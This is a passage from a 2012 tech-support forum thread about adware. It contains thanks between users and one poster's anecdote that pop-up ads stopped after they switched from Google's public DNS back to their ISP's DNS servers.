Update your antivirus frequently,do not click on suspicious links

Safe surfing :)

#13 mattsbach

mattsbach
  • Topic Starter

  • Members
  • 85 posts
  • OFFLINE
  •  
  • Local time:01:56 PM

Posted 16 April 2012 - 11:23 PM

wonderful - thank you so much!

#14 narenxp

narenxp

  • BC Advisor
  • 16,371 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:India
  • Local time:12:56 PM

Posted 17 April 2012 - 12:20 AM

You're most welcome :thumbsup:

#15 Buddhaa

Buddhaa

  • Members
  • 1 posts
  • OFFLINE
  •  
  • Local time:09:56 AM

Posted 28 April 2012 - 01:58 PM

This could be it.

As we were developing a new website for our client, we saw one of those our client adwords ads popping up on their own site. So now we know where their are coming from and who benefit from them.

After running a dns tool listed above, my firewall popup a message about the dns server I was using on this computer.
8.8.8.8 and 8.8.4.4 - That's Google DNS server setting that I manually changed few month back for what I thought would be a speed improvement.

Putting 2 and 2 together, I rolled back to my ISP dns server and didn't get an ad since then.

It's been months that this thing drive me nuts; I registered to share this since no amount of tools will find this.




0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users